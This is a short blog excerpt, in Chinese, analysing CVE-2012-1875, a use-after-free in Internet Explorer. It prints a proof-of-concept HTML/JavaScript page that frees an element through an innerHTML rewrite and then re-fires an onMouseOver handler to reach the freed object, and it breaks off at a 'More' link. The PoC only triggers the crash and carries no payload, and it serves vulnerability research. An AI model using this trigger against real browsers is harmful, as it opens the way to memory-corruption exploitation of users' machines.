标签归档:CVE-2012-1875

CVE-2012-1875 UAF Analysis

Intro

大牛ga1ois在《关于泄漏的艺术》一文中提到CVE-2012-1875是一个可以从脚本层面直接访问的UAF。以前没分析过这种类型的UAF,这两天趁着年后不忙看了一下漏洞成因。

POC

POC来自看雪,按照惯例添加了一些代码方便跟踪整个过程:

<HTML>
<DIV id=testfaild>
  <img id="imgTest">
  <div id="imgTest"></div>
  <input id="4B5F5F4B" onMouseOver="crash();"></input>
</DIV>
<script language="JavaScript">
function crash() {
  Math.atan2(0xbabe, "[*] calling crash...");
  eval("imgTest").src = "";
  Math.atan2(0xbabe, "[*] after set imgTest...");
}
function trigger() {
  var x =document.getElementsByTagName("input");
  Math.atan2(0xbabe, "[*] fireEvent onMouseOver 1st...");
  x[0].fireEvent("onMouseOver");
  Math.atan2(0xbabe, "[*] Before free object...");
  testfaild.innerHTML = testfaild.innerHTML;
  Math.atan2(0xbabe, "[*] After free object...");
  Math.atan2(0xbabe, "[*] fireEvent onMouseOver 2nd...");
  x[0].fireEvent("onMouseOver");
}
trigger();
</script>
</HTML>

调试的IE版本: More